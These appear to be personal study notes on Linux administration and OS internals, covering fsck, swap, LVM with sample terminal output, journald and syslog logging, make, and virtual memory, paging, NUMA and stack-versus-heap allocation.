  • You should never run fsck on a mounted filesystem. The kernel may alter data in the filesystem as you run the check, causing runtime mismatches that can crash the system and corrupt files. There is one exception to this rule. If you mount the root partition in read-only, single-user mode, you can run fsck on it.
  • When fsck asks you about reconnecting an inode, it has found a file that doesn’t appear to have a name. When reconnecting an inode, fsck will place the file in the lost+found directory with a number as the name. fsck does this by walking through the inode table and directory structure to generate new link counts and a new block allocation map (such as the block bitmap), and then it compares this newly generated data with the filesystem on the disk. If there are mismatches, fsck must fix the link counts and determine what to do with any inodes and/or data that didn’t come up when it traversed the directory structure.
  • On a system that has many problems, fsck can make things worse. One way to tell if you should cancel the fsck utility is if it asks a lot of questions while running the repair process. This is usually indicative of a bigger problem. If you think this is the case, you can run fsck -n to run fsck in dry mode (no changes will be made to the partition).
  • If you suspect that a superblock is corrupt, perhaps because someone overwrote the beginning of the disk, you might be able to recover the filesystem with one of the superblock backups that mkfs creates. Use fsck -b <num> to replace the corrupted superblock with an alternate at num and hope for the best. If you don’t know where to find a backup for the superblock, you can run mkfs -n on the device to view a list of superblock backup numbers without destroying your data.
  • You normally do not need to check ext3/4 filesystems manually because the journal ensures data integrity.
  • The kernel will not mount an ext3/4 filesystem with a non-empty journal. You can flush the journal using e2fsck -fy /dev/<device>

Special purpose filesystems

  • proc - mounted on /proc. Each numbered directory inside /proc refers to the PID of a running process on the system. The directory /proc/self represents the current process.
  • sysfs - mounted on /sys. See ./devices.md for more info.
  • tmpfs - mounted on /run and other locations. Allows you to use physical memory and swap space as temporary storage.
  • squashfs - a type of read-only filesystem where content is stored in a compressed format and extracted on-demand through a loopback device.
  • overlay - a filesystem that merges directories in a composite directory. Often used by containers.

Swap space

  • Swap space is used to augment the RAM on a machine with disk space
  • If you run out of physical memory, the Linux virtual memory system can move pages of memory to and from disk storage (swap space). This is referred to as paging.
  • You can use mkswap to create swap space on a partition. Then use swapon to enable it. You can also use swapoff to disable swap space.
  • In addition to using disk space for swap, you can also use a file. Create the file with dd (example: dd if=/dev/zero of=/swapfile bs=1024k count=<size in megabytes>), then run mkswap and swapon on the file just as you would for a partition.
  • High performance servers should not have swap space and should avoid disk access if at all possible.

Prefetch

A common file system workload involves reading a large amount of file data sequentially, for example, for a file system backup. This data may be too large to fit in the cache, or it may be read only once, and is therefore unlikely to remain in the cache. Such a workload would perform relatively poorly, as it would have a low cache-hit ratio.

Prefetch is a common file system feature for solving this problem. It can detect a sequential read workload based on the current and previous file I/O offsets, and then predict and issue disk reads before the application has requested them. This populates the file system cache, so that if the application does perform the expected read, it results in a cache-hit, rather than reading from much slower disk.

Prefetch can typically be tuned in most systems.
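The prefetch described above happens automatically inside the file system. As a related illustration only (my assumption, not something from these notes), an application can also hint that it is about to read a file sequentially with posix_fadvise, which encourages the kernel's readahead logic. The file path below is hypothetical:

#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(void) {
    int fd = open("/var/log/syslog", O_RDONLY);   // hypothetical file
    if (fd < 0) { perror("open"); return 1; }

    // Advise sequential access for the whole file (offset 0, len 0 = to EOF).
    int err = posix_fadvise(fd, 0, 0, POSIX_FADV_SEQUENTIAL);
    if (err != 0)
        fprintf(stderr, "posix_fadvise: %s\n", strerror(err));

    char buf[65536];
    while (read(fd, buf, sizeof(buf)) > 0)
        ;   // sequential reads; readahead keeps the page cache populated

    close(fd);
    return 0;
}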

Write-back Caching

Write-back caching is commonly used by file systems to improve write performance. It works by treating writes as completed after the transfer to main memory, and writing them to disk sometime later, asynchronously. The file system process for writing this ‘dirty’ data to disk is called ‘flushing’. The trade-off of write-back cache is reliability. DRAM-based main memory is volatile, and dirty data can be lost in the event of a power failure. Data could also be written to disk incompletely, leaving the disk in a corrupt state. If file-system metadata becomes corrupted, the file system may no longer load.

Synchronous writes

Synchronous writes are used by some applications such as database log writers, where the risk of data corruption for asynchronous writes is unacceptable.
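As a minimal sketch of the difference (file names are hypothetical), the first write below relies on write-back caching, while the second uses O_SYNC/fsync so the call does not return until the data has reached stable storage:

#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(void) {
    const char *msg = "transaction record\n";

    // Write-back (default): write() returns once the data is in the page
    // cache; the kernel flushes the dirty pages to disk later.
    int fd = open("async.log", O_WRONLY | O_CREAT | O_APPEND, 0644);
    if (fd < 0 || write(fd, msg, strlen(msg)) < 0) perror("async write");
    close(fd);

    // Synchronous: O_SYNC makes each write() wait until the data has been
    // written to disk, the behavior a database log writer would want.
    int sfd = open("sync.log", O_WRONLY | O_CREAT | O_APPEND | O_SYNC, 0644);
    if (sfd < 0 || write(sfd, msg, strlen(msg)) < 0) perror("sync write");
    fsync(sfd);   // alternatively, flush explicitly after buffered writes
    close(sfd);
    return 0;
}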

VFS (Virtual File System)

VFS provides a common interface for different file system types. Prior to VFS, different file systems required different system calls to interact with each one. The calls for interacting with a FAT file system were different from those for an ext file system.

File System Caches

Unix originally only had the buffer cache to improve performance of block device access. Nowadays, Linux has multiple different cache types.

  • Page Cache
  • Buffer cache
  • Directory Cache
  • inode cache

Copy on write

A Copy on write (COW) file system does not overwrite existing blocks but instead follows these steps:

  1. Write blocks to a new location (a new copy)
  2. Update references to new blocks
  3. Add old blocks to the free list

This helps maintain file system integrity in the event of a system failure, and also helps improve performance by turning random writes into sequential ones

Troubleshooting File Systems

Key metrics for file systems include:

  • Operation Rate
  • Operation latency

In Linux, there are typically no readily available metrics for file system operations (the exception being NFS, via nfsstat).

Tools:

  • mount
  • free
  • top
  • vmstat
  • sar
  • slabtop
  • filetop
  • cachestat
  • fsck
  • ext4slower
  • e2fsck

Groups

Groups offer a way to share files and directories among users.

  • The /etc/group file defines the group IDs. Each line in this file represents a group, with fields separated by colons. There are 4 fields:

    1. The group name
    2. The group password (this can be ignored)
    3. The group ID
    4. An optional list of users that belong to the group (see the example after this list)
  • To see the groups you belong to, run groups
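For illustration, a line in /etc/group with those four fields might look like this (the group and user names are hypothetical):

developers:x:1001:alice,bob

Here developers is the group name, x indicates the unused password field, 1001 is the group ID, and alice and bob are members.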

Hashing

Interrupts and Traps

  • Most operating systems are implemented as interrupt-driven systems, meaning the OS doesn’t run until some entity needs it to do something; it is woken up to handle the request.
  • System calls are implemented as special trap instructions that are defined as part of the CPU’s ISA.
  • Each system call is associated with a number. When an application wants to invoke a system call, it places the desired call’s number in a known location and issues a trap instruction to interrupt the OS. The trap causes the CPU to stop executing the application’s instructions and begin executing the OS’s handler for the requested call (see the sketch after this list).
  • Interrupts that come from the hardware layer, such as when a NIC receives data from the network, are typically referred to as hardware interrupts, or just interrupts. Interrupts that come from the software layer as the result of instruction execution, are known as traps.
  • Unlike system calls, hardware interrupts are delivered via the CPU’s interrupt bus. A device places a signal on the interrupt bus when it needs the CPU’s attention.
  • When the CPU is done handling an interrupt, it restores the state it saved before the interrupt occurred and resumes processing.
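A minimal sketch of invoking a system call by number: the libc syscall(2) wrapper below places the call number where the kernel expects it and issues the architecture's trap instruction on our behalf.

#include <stdio.h>
#include <sys/syscall.h>
#include <unistd.h>

int main(void) {
    // SYS_getpid is the system call number for getpid on this platform.
    long pid = syscall(SYS_getpid);   // same effect as calling getpid()
    printf("pid obtained via trap: %ld\n", pid);
    return 0;
}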

kernel subsystems

The Linux kernel has 5 subsystems:

  1. The Process Scheduler (SCHED)
  2. The Memory Manager (MM)
  3. The Virtual File System (VFS)
  4. The Networking Interface (NET)
  5. The Inter-process Communication (IPC)

Kernel structure and subsystem dependencies

Key Value Store

Hard and Soft Links

Use ln to manage soft and hard links

Inodes

  • An inode is a reference to a file on the disk
  • The stat command can be used to view inodes
  • When there are 0 links to an inode, the data itself is erased from the disk
  • Hard links point to the same inode
  • You can only hardlink to files, not directories
  • You cannot hard link to files across a mount point; hard links only work within the same filesystem (see the sketch after this list)
  • Soft links create a shortcut directly to the file, rather than a link to the inode
  • readlink can be used to view the file behind a softlink
  • broken soft links are highlighted in red in the output of ls -l
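A minimal sketch of the difference between hard and soft links, assuming a file named data.txt already exists in the current directory (the file names are hypothetical): the hard link shares the original inode and bumps its link count, while the symlink gets its own inode that merely stores the target path.

#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

int main(void) {
    struct stat st;

    link("data.txt", "data-hard.txt");      // hard link: same inode, link count +1
    symlink("data.txt", "data-soft.txt");   // soft link: new inode that stores the path

    if (stat("data.txt", &st) == 0)
        printf("inode=%lu links=%lu\n",
               (unsigned long)st.st_ino, (unsigned long)st.st_nlink);
    return 0;
}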

commands

Logging

Journald

Most programs write their log output to the syslog service. The syslogd daemon performs this service on traditional systems by listening for these messages and sending them to the appropriate channel (file, database, email, etc.) when received. On modern systems, journald typically does this work. journalctl can be used to work with journald.

You can determine if your system is using journald by typing journalctl in a shell. If the system is using journald, you will see a paged output. Unless you have a system that is using a traditional syslog daemon such as syslogd or rsyslogd, you will use the journal. To get the full output from journalctl, you need to run the command as root or as a user of the adm or systemd-journal groups.

  • Some examples of using journalctl:

    • To search for logs from a process using the PID: journalctl _PID=555 (where 555 is the PID)
    • To search for messages from the past 4 hours: journalctl -S -4h
    • To filter by unit: journalctl -u sshd.service
    • To list all values a given field has taken: journalctl -F _SYSTEMD_UNIT
    • If you do not know what fields are available, use: journalctl -N
    • To view the logs from this boot: journalctl -b
    • To view the logs from the previous boot: journalctl -b -1
    • To list all boots by ID: journalctl --list-boots
    • To view Kernel messages: journalctl -k
    • To filter by severity level: journalctl -p 3 (where 3 is the severity level. Values range from 0 (most important) to 7 (least important))
  • Journal maintenance

    • the journal files stored in /var/log/journal do not need to be rotated. journald handles the maintenance of these files.

Syslogd

Syslogd first appeared with the sendmail email server back in the 1980s. Developers of other services readily adopted it, and RFC 3164 was eventually published to describe it. The syslog mechanism is simple: it listens on a Unix domain socket, /dev/log. It can also listen on a network socket, enabling any device on the network to send logs to it; this lets rsyslogd act as a log server.

  • Facility, severity, and priority
    • Syslog sends messages of various types from different services to different destinations. Because of this, it needs a way to classify each message.
    • The facility is a general category of service, used to identify the service that sent the message. The available facilities in the syslog protocol are hardwired and there is no way to add your own. However, you can use a general local0 through local7 value.
    • The severity is the urgency of the log messages. This can be a value from 0 (most urgent) to 7 (least urgent)
        0. emerg
        1. alert
        2. crit
        3. err
        4. warn
        5. notice
        6. info
        7. debug
    • The facility and the severity together make up the priority, packaged as a single value in the syslog protocol. You can read more about this in RFC 5424. A minimal example of setting a facility and severity from C via the syslog(3) API is sketched below.
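A minimal sketch using the standard syslog(3) API (the program name and message are made up):

#include <syslog.h>

int main(void) {
    // LOG_LOCAL0 is one of the general-purpose local0-local7 facilities;
    // LOG_WARNING is severity 4. Together they form the message's priority.
    openlog("mydaemon", LOG_PID, LOG_LOCAL0);
    syslog(LOG_WARNING, "disk usage above %d%%", 90);
    closelog();
    return 0;
}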

Logfile Rotation

When you are using a syslog daemon, log messages get put into files somewhere on the system. These files need to be rotated on a schedule to prevent the files from consuming too much storage space. logrotate performs this task.

  • How logrotate works:
    1. Removes the oldest file, auth.log.3
    2. Renames auth.log.2 to auth.log.3
    3. Renames auth.log.1 to auth.log.2
    4. Renames auth.log to auth.log.1

lvm (logical volume manager)

  • LVM creates an abstraction layer between physical storage and the file system, allowing the file system to be resized and span across multiple disks

  • Physical volumes are grouped into groups of volumes, called Volume Groups. These Volume Groups are then divided into Logical Volumes

  • LVM Acronyms

    • PV = Physical Volume, real physical storage devices

      • sudo lvmdiskscan can be used to list devices that may be used as physical volumes
        04:52:03 azureadmin@centos01 ~ → sudo lvmdiskscan
        /dev/sda1  [     500.00 MiB]
        /dev/sda2  [      29.02 GiB]
        /dev/sda15 [     495.00 MiB]
        /dev/sdb1  [     <64.00 GiB]
        /dev/sdf   [       5.00 GiB]
        /dev/sdh   [       5.00 GiB]
        /dev/sdi   [       5.00 GiB]
        3 disks
        4 partitions
        0 LVM physical volume whole disks
        0 LVM physical volumes
        
      • sudo pvcreate /dev/sdf /dev/sdh /dev/sdi can be used to initialize 3 disks as LVM physical volumes
        04:52:06 azureadmin@centos01 ~ → sudo pvcreate /dev/sdf /dev/sdh /dev/sdi
        Physical volume "/dev/sdf" successfully created.
        Physical volume "/dev/sdh" successfully created.
        Physical volume "/dev/sdi" successfully created.
        
      • sudo pvs can be used to list physical volumes used by LVM
        04:52:19 azureadmin@centos01 ~ → sudo pvs
        PV         VG Fmt  Attr PSize PFree
        /dev/sdf      lvm2 ---  5.00g 5.00g
        /dev/sdh      lvm2 ---  5.00g 5.00g
        /dev/sdi      lvm2 ---  5.00g 5.00g
        
    • VG = Volume Group

      • After LVM has physical devices (pvs), you add the pvs to a volume group (vg). This tells LVM how it can use the storage capacity
      • sudo vgcreate my_vol /dev/sdf /dev/sdh will create a new VG with 2 PVs
        04:58:13 azureadmin@centos01 ~ → sudo vgcreate my_vol /dev/sdf /dev/sdh
        Volume group "my_vol" successfully created
        
      • Once disks are added to a volume group, they are seen by the system as one contiguous block of storage
      • You can add another disk to the volume group using vgextend
        05:00:06 azureadmin@centos01 ~ → sudo vgextend my_vol /dev/sdi
        Volume group "my_vol" successfully extended
        
      • use sudo vgs to view the status of Volume Groups:
        05:00:14 azureadmin@centos01 ~ → sudo vgs
        VG     #PV #LV #SN Attr   VSize   VFree
        my_vol   3   0   0 wz--n- <14.99g <14.99g
        
      • use sudo vgreduce my_vol /dev/sdi to remove a physical volume from a volume group
        05:00:39 azureadmin@centos01 ~ → sudo vgreduce my_vol /dev/sdi
        Removed "/dev/sdi" from volume group "my_vol"
        
    • LV = Logical Volume

      • A logical volume is similar to a partition
      • sudo lvcreate --size 2G --name partition1 my_vol can be used to create a logical volume of 2 gigabytes
        05:02:22 azureadmin@centos01 ~ → sudo lvcreate --size 2G --name partition1 my_vol
        Logical volume "partition1" created.
        
      • You can view logical volumes using sudo lvs
        05:03:49 azureadmin@centos01 ~ → sudo lvs
        LV         VG     Attr       LSize Pool Origin Data%  Meta%  Move Log Cpy%Sync Convert
        partition1 my_vol -wi-a----- 2.00g
        partition2 my_vol -wi-a----- 6.00g
        
      • to tell a logical volume to use all remaining space in its volume group, use sudo lvresize
        05:03:50 azureadmin@centos01 ~ → sudo lvresize --extents 100%VG my_vol/partition1
        Reducing 100%VG to remaining free space 3.99 GiB in VG.
        Size of logical volume my_vol/partition1 changed from 2.00 GiB (512 extents) to 3.99 GiB (1022 extents).
        Logical volume my_vol/partition1 successfully resized.
        
      • the path to LVs on the system can be found using lvdisplay
        05:08:32 azureadmin@centos01 ~ → sudo lvdisplay  | grep "LV Path"
        LV Path                /dev/my_vol/partition1
        LV Path                /dev/my_vol/partition2
        
      • You can then add a file system to a LV using common file system management commands
        05:08:41 azureadmin@centos01 ~ → sudo mkfs.xfs /dev/my_vol/partition1
        meta-data=/dev/my_vol/partition1 isize=512    agcount=4, agsize=261632 blks
                =                       sectsz=4096  attr=2, projid32bit=1
                =                       crc=1        finobt=1, sparse=1, rmapbt=0
                =                       reflink=1
        data     =                       bsize=4096   blocks=1046528, imaxpct=25
                =                       sunit=0      swidth=0 blks
        naming   =version 2              bsize=4096   ascii-ci=0, ftype=1
        log      =internal log           bsize=4096   blocks=2560, version=2
                =                       sectsz=4096  sunit=1 blks, lazy-count=1
        realtime =none                   extsz=4096   blocks=0, rtextents=0
        Discarding blocks...Done.
        
      • If the LV contains a file system, you must take extra caution when resizing it. You must pass the --resizefs parameter to lvresize
      • sudo lvresize --resizefs --size 3G my_vol/partition1
      • XFS file system shrinking is not supported
  • If you forget what commands to use for LVM, simply open the man pages for LVM and scroll to the bottom to get a list of available commands

    • man lvm
  • sudo lvmdiskscan will show what disks are available

  • To create a physical volume:

    • sudo pvcreate /dev/sdd /dev/sde /dev/sdf
    • Example:
      [azureadmin@centos01 shares]$ sudo pvcreate /dev/sdd /dev/sde
      Physical volume "/dev/sdd" successfully created.
      Physical volume "/dev/sde" successfully created.
      
    • To list physical volumes: sudo pvs
      [azureadmin@centos01 shares]$ sudo pvs
      PV         VG Fmt  Attr PSize PFree
      /dev/sdd      lvm2 ---  5.00g 5.00g
      /dev/sde      lvm2 ---  5.00g 5.00g
      
    • After creating the physical volume, add it to a volume group:
      • sudo vgcreate my_volume /dev/sdd /dev/sde
    • List volume groups:
      [azureadmin@centos01 shares]$ sudo vgs
      VG        #PV #LV #SN Attr   VSize VFree
      my_volume   2   0   0 wz--n- 9.99g 9.99g
      
    • To expand a volume group, add a PV. Then use vgextend to add the PV to the volume group
      • sudo vgextend my_volume /dev/sdf
    • You can also remove a physical volume from the volume group:
      • sudo vgreduce my_volume /dev/sdf
    • Then you can remove the physical volume:
      • sudo pvremove /dev/sdf
    • Logical volumes are like partitions
    • you can create a new logical volume:
      • sudo lvcreate --size 3G --name partition1 my_volume
    • To grow a logical volume to use all the space it has available
      • sudo lvresize --extents 100%VG my_volume/partition1

Device Mapper

  • The kernel uses a driver called the device mapper to route requests for a location on a logical volume’s block device to the true location on an actual device. After LVM has determined the structure of the logical volumes from all of the headers on the PVs, it communicates this to the kernel’s device mapper driver in order to initialize the block devices for the logical volumes and load their mapping tables. It achieves this with the ioctl(2) syscall on the /dev/mapper/control device file
  • To get an inventory of mapped devices currently serviced by the device mapper, use dmsetup:
    • dmsetup info
  • There is a header at the beginning of every LVM PV that identifies the volume as well as its volume group and the logical volumes within.
    • You can view the lvm header on a physical volume using dd:
      • dd if=<path to pv> count=1000 | strings | less
      • Example: dd if=/dev/sdb1 count=1000 | strings | less

make

The basic idea behind make is the target, a goal that you want to achieve.

  • A target can be a file or a label.
  • Targets can have dependencies. To build a target, make follows rules.

A simple makefile

# object files
OBJS=aux.o main.o
MSG=building...

all: myprog

myprog: $(OBJS)
	echo $(MSG)
	$(CC) -o myprog $(OBJS)

In the example above, the # in the first line denotes a comment. The second line is a macro definition that sets the OBJS variable to two object file names, and the third defines a MSG macro holding a message. all is the first target; the first target is always the default, which is what make builds when you run make on the command line with no targets specified. In make, macros and variables are essentially the same thing, and both are referenced as $(NAME), as in $(OBJS) and $(CC). A target’s dependencies come after the “:”, and the rule for building the target is the indented command lines beneath it. make is very strict about those indents: they must be tabs, not spaces!

memory

The CPU has a memory management unit (MMU) to add flexibility in accessing memory. The kernel assists the MMU by breaking down the memory used by a process into chunks called ‘pages’. The kernel maintains a data structure, called a ‘page table’, that maps a process’s virtual page addresses into real page addresses in memory. As a process accesses memory, the MMU translates the virtual addresses used by the process into real addresses based on the kernel’s page table.

A user process doesn't need all of its memory to be immediately available in order to run. The kernel generally loads and allocates pages as a process needs them; this system is known as on-demand paging or just demand paging. Let's see how a program starts and runs as a new process:

1) The kernel loads the beginning of the program's instruction code into memory pages.
2) The kernel may allocate some working-memory pages to the new process.
3) As the process runs, it may determine that the next instruction it needs isn't in any of the memory pages that the kernel loaded initially. At this point, the kernel takes over, loads the necessary page into memory, and then lets the program resume execution.

You can get a system's page size by looking at the kernel configuration:

getconf PAGE_SIZE
4096
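The same value can be queried from C with sysconf(3), a small sketch:

#include <stdio.h>
#include <unistd.h>

int main(void) {
    long page_size = sysconf(_SC_PAGESIZE);   // typically 4096 bytes
    printf("page size: %ld bytes\n", page_size);
    return 0;
}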

Page Faults

If a memory page isn't ready when a process wants to use it, the process triggers a page fault. If a page fault occurs, the kernel takes control of the CPU from the process in order to get the page ready. There are two kinds of page faults, major and minor.

Minor page faults occur when the page is in main memory, but the MMU doesn't know where it is. A major page fault occurs when the desired memory page isn't in main memory at all, which means that the kernel must load it from disk or some other slow storage media. Major page faults will bog down a system. Some major page faults are unavoidable, like when the system loads the code from disk when running a program for the first time.

You can drill down to the page faults for individual processes by using the top, ps, and time commands. You’ll need to use the system version of time for this.

ryan:todo/  |main ?:3 ✗|$ /usr/bin/time cal > /dev/null
0.00user 0.00system 0:00.00elapsed 100%CPU (0avgtext+0avgdata 2824maxresident)k
0inputs+0outputs (0major+130minor)pagefaults 0swaps

As you can see in the output above, there were 0 major page faults and 130 minor page faults when running the cal program.

Virtual Memory

  • The OS’s process abstraction provides each process with a virtual memory space. Virtual memory is an abstraction that gives each process its own private, logical address space in which its instructions and data are stored. Each process’s virtual address space can be thought of as an array of addressable bytes from 0 up to some maximum address. Processes cannot access the contents of one another’s address spaces.

  • Operating systems implement virtual memory as part of the lone view abstraction of processes. That is, each process only interacts with memory in terms of its own virtual address space rather than the reality of many processes sharing the computer’s RAM simultaneously.

  • A process’s virtual address space is divided into several sections, each of which stores a different part of the process’s memory. The top part is reserved for the OS and can only be accessed in kernel mode. The text and data parts of a process’s virtual address space are initialized from the program executable file. The text section contains the program instructions, and the data section contains global variables. The stack and heap sections vary in size as the process runs. Stack space grows in response to the process making function calls, and shrinks as it returns from the function calls. Heap space grows when the process dynamically allocates memory space (via calls to malloc), and shrinks when the process frees memory space (with calls to free). The heap and stack portions of a process’s memory are typically located far apart in its address space to maximize the amount of space either can use. In the layout shown below, the stack sits at the bottom of the diagram and grows upward, while the heap sits above it and grows downward toward the stack.

    --------------------------------
    |            OS Code           |
    --------------------------------
    |       Application Code       |
    --------------------------------
    |      Data (Global Vars)      |
    --------------------------------
    |             Heap             |
    |             ⌄⌄⌄⌄             |
    |                              |
    |                              |
    --------------------------------
    |                              |
    |                              |
    |            ^^^^^             |
    |            Stack             |
    --------------------------------
    
  • A page fault occurs when a process tries to access a page that is not currently stored in RAM. The opposite is a page hit. To handle a page fault, the OS needs to keep track of which RAM frames are free so that it can find a free frame of RAM into which the page read from disk can be stored.

  • Page Table Entries (PTE) include a dirty bit that is used to indicate if the in-RAM copy of the page has been modified.

Memory Addresses

  • Because processes operate within their own virtual address spaces, operating systems must make an important distinction between two types of memory addresses. Virtual addresses refer to storage locations in a process’s virtual address space, and physical addresses refer to a location in RAM.
  • At any point in time, the OS stores in RAM the address space contents of many processes as well as OS code that it may map into every process’s virtual address space.

Virtual Memory and Virtual Addresses

  • Virtual memory is the per-process view of its memory space, and virtual addresses are addresses in the process’s view of its memory. If two processes run the same binary executable, then they will have the exact same virtual addresses for function code and for global variables in their address spaces.
  • Processors generally provide some hardware support for virtual memory. An OS can make use of this hardware support for virtual memory to perform virtual to physical address translation quickly, avoiding having to trap to the OS to handle every address translation.
  • The memory management unit (MMU) is the part of the computer hardware that implements address translation. At its most complete, the MMU performs full translation.

Paging

  • Although many virtual memory systems have been implemented over the years, paging is now the most widely used implementation of virtual memory.
  • In a Paged virtual memory system, the OS divides the virtual address space of each process into fixed-sized chunks called pages. The OS defines the page size for the system. Page sizes of a few kilobytes are commonly used in general purpose operating systems today. 4 KB is the default page size on many systems.
  • Physical memory is similarly divided into page-sized chunks called frames. Because pages and frames are defined to be the same size, any page of a process’s virtual memory can be stored in any frame of physical RAM.

Virtual and Physical Addresses in Paged Systems

  • Paged virtual memory systems divide the bits of a virtual address into two parts: the high-order bits specify the page number on which the virtual address is stored, and the low-order bits correspond to the byte offset within the page (which byte from the top of the page corresponds to the address).
  • Similarly, paging systems divide physical addresses into two parts: the high-order bits specify the frame number of physical memory, and the low-order bits specify the byte offset within the frame. Because frames and pages are the same size, the byte offset bits in a virtual address are identical to the byte offset bits in its translated physical address. Virtual addresses differ from their translated physical addresses only in their high-order bits, which specify the virtual page number and the physical frame number, respectively (see the sketch below).
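A small worked sketch of that split, assuming 4 KiB pages (12 offset bits) and a made-up page-table mapping of page 0x12 to frame 0x7a:

#include <stdio.h>
#include <stdint.h>

#define PAGE_SHIFT 12                       /* 4 KiB pages */
#define PAGE_MASK  ((1u << PAGE_SHIFT) - 1)

int main(void) {
    uint32_t vaddr  = 0x12345;
    uint32_t vpn    = vaddr >> PAGE_SHIFT;  // virtual page number = 0x12
    uint32_t offset = vaddr & PAGE_MASK;    // byte offset within page = 0x345

    uint32_t frame  = 0x7a;                 // hypothetical frame from the page table
    uint32_t paddr  = (frame << PAGE_SHIFT) | offset;   // 0x7a345

    printf("vpn=0x%x offset=0x%x paddr=0x%x\n", vpn, offset, paddr);
    return 0;
}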

Page tables

  • Because every page of a process’s virtual memory space can map to a different frame of RAM, the OS must maintain mappings for every virtual page in the process’s address space. The OS keeps a per-process page table that it uses to store the process’s virtual page number to physical frame number mappings.

Translation Look-aside Buffer (TLB)

  • Although paging has many benefits, it also results in a significant slowdown to every memory access. In a paged virtual memory system, every load and store to a virtual memory address requires two RAM accesses: the first reads the page table entry (PTE) to get the frame number for virtual-to-physical address translation, and the second reads or writes the byte(s) at the physical RAM address. Thus, in a paged virtual memory system, every memory access is twice as slow as in a system that supports direct physical RAM addressing.
  • One way to reduce the additional overhead of paging is to cache page table mappings of virtual page numbers to physical frame numbers. When translating a virtual address, the MMU first checks for the page numbers in the cache. If found, then the page’s frame number mapping can be grabbed from the cache entry, avoiding one RAM access for reading the PTE.
  • A translation look-aside buffer (TLB) is a hardware cache that stores (page number, frame number) mappings. It is a small, fully associative cache that is optimized for fast lookups in hardware. When the MMU finds a mapping in the TLB (a TLB hit), a page table lookup is not needed, and only one RAM access is required to execute a load or store to a virtual memory address.

How Linux Organizes Virtual Memory

UVA (User Virtual Addressing)

KVA (Kernel Virtual Addressing)

How Linux Organizes Physical Memory

At boot, the kernel organizes and partitions RAM into a tree-like hierarchy consisting of nodes, zones, and page frames (page frames are physical pages of RAM). The top level of the hierarchy is made up of nodes, which represent a collection of memory that is local to a particular CPU or group of CPUs. Each node contains one or more zones, which are collections of page frames that share similar characteristics. The zones are further divided into page frames, which are the smallest unit of memory that can be allocated by the kernel.

Any processor core can access any physical memory location, regardless of which node it belongs to. However, accessing memory that is local to the core’s node is faster than accessing memory that is located on a different node. This is because local memory access avoids the overhead of traversing interconnects between nodes.

NUMA vs. UMA

Essentially, nodes are data structures that are used to denote and abstract a physical RAM module on the system motherboard and its associated controller chipset. Actual hardware is being abstracted via software. Two types of memory architectures exist, UMA (Uniform Memory Access) and NUMA (Non-Uniform Memory Access).

NUMA

  • In a NUMA architecture, each processor has its own local memory, and accessing local memory is faster than accessing memory that is located on a different node. This is because local memory access avoids the overhead of traversing interconnects between nodes.
  • NUMA architectures are commonly used in high-performance computing systems, where multiple processors are used to perform complex computations. By using NUMA, these systems can achieve better performance and scalability than traditional UMA architectures.
  • NUMA systems must have at least 2 physical memory banks (nodes) to be considered NUMA.
  • One can use the lstopo command to view the NUMA topology of a system. The output will show the number of nodes, the amount of memory in each node, and the CPUs that are associated with each node. hwloc is another tool that can be used to view the NUMA topology of a system. It provides a graphical representation of the system’s hardware topology, including the NUMA nodes and their associated memory and CPUs.
  • The number of zones per node is dynamically determined by the kernel at boot time based on the amount of memory in the node and the system architecture. The kernel typically creates three zones per node: DMA, DMA32, and Normal. The DMA zone is used for memory that is accessible by devices that use direct memory access (DMA), the DMA32 zone is used for memory that is accessible by 32-bit devices, and the Normal zone is used for all other memory. In addition to these standard zones, the kernel may also create additional zones based on the system architecture and configuration. You can view /proc/buddyinfo to see the memory zones and their associated page frames.
λ ch7 (main) $ cat /proc/buddyinfo
Node 0, zone      DMA      0      0      0      0      0      0      0      0      1      1      2
Node 0, zone    DMA32      6      6      8      7      5      6      7      4      8      9    283
Node 0, zone   Normal   3170   7694  10543   8113   5011   1761    552    182     55     66  10595

UMA

  • In a UMA architecture, all processors share the same physical memory, and accessing any memory location takes the same amount of time, regardless of which processor is accessing it.
  • In Linux, UMA systems are treated as NUMA systems with a single node. This means that the kernel still uses the same data structures and algorithms for managing memory, but there is no need to consider the locality of memory access.

Memory Management

  • When you get done using heap memory, it needs to be cleaned up. This can be done using a process known as ‘garbage collection’, or manually by the developer when creating the app
  • Implementation of both the stack and heap is usually down to the runtime / OS.
  • There are 2 memory constructs: the stack and the heap.

Stack:

  • A stack is a structure that represents a sequence of objects or elements arranged in a linear order. What does that mean? It simply means you can add or remove elements only in a linear order, at one end. The call stack is the portion of memory that temporarily holds the variables created by each function call.
  • Stored in computer RAM just like the heap.
  • Variables created on the stack will go out of scope and are automatically deallocated.
  • Much faster to allocate in comparison to variables on the heap.
  • Implemented with an actual stack data structure.
  • Stores local data, return addresses, used for parameter passing.
  • Can have a stack overflow when too much of the stack is used (mostly from infinite or too deep recursion, very large allocations).
  • Data created on the stack can be used without pointers.
  • You would use the stack if you know exactly how much data you need to allocate before compile time and it is not too big.
  • Usually has a maximum size already determined when your program starts.
  • A collection of data needed for a single method is called a stack frame

Heap:

  • Stored in RAM just like the stack.
  • In C++, variables on the heap must be destroyed manually and never fall out of scope. The data is freed with delete, delete[], or free.
  • Slower to allocate in comparison to variables on the stack.
  • Used on demand to allocate a block of data for use by the program.
  • Can have fragmentation when there are a lot of allocations and deallocations.
  • In C++ or C, data created on the heap will be pointed to by pointers (from the stack) and allocated with new or malloc respectively.
  • Can have allocation failures if too big of a buffer is requested to be allocated.
  • You would use the heap if you don’t know exactly how much data you will need at run time or if you need to allocate a lot of data.
  • Responsible for memory leaks.

Example:

void foo()
{
  char *pBuffer; //<--nothing allocated yet (excluding the pointer itself, which is allocated here on the stack).
  bool b = true; // Allocated on the stack.
  if(b)
  {
    //Create 500 bytes on the stack
    char buffer[500];

    //Create 500 bytes on the heap
    pBuffer = new char[500];

   }//<-- buffer is deallocated here, pBuffer is not
}//<--- oops there's a memory leak, I should have called delete[] pBuffer;

why would an object be created on the heap or stack?

In computer science, whether an object is created on the heap or the stack depends on several factors, including object size, lifetime, dynamic allocation needs, sharing requirements, and polymorphism.

  1. Object size: If the object is small, it can be created on the stack, but if it’s large, then it should be created on the heap.
  2. Lifetime: If the object’s lifetime needs to transcend beyond the block/scope where it was created, objects should be created on the heap. Alternatively, If the object’s lifetime is within the context of the block/scope where it was created, objects can be created on the stack.
  3. Dynamic allocation: Heap objects can be allocated dynamically at runtime, while stack objects need to be allocated at compile time.
  4. Sharing: Heap objects can be shared between multiple threads, while stack objects are local to a single thread.
  5. Polymorphism: Creating objects on the heap allows for polymorphism, where objects of different derived classes can be referenced using a base class pointer.

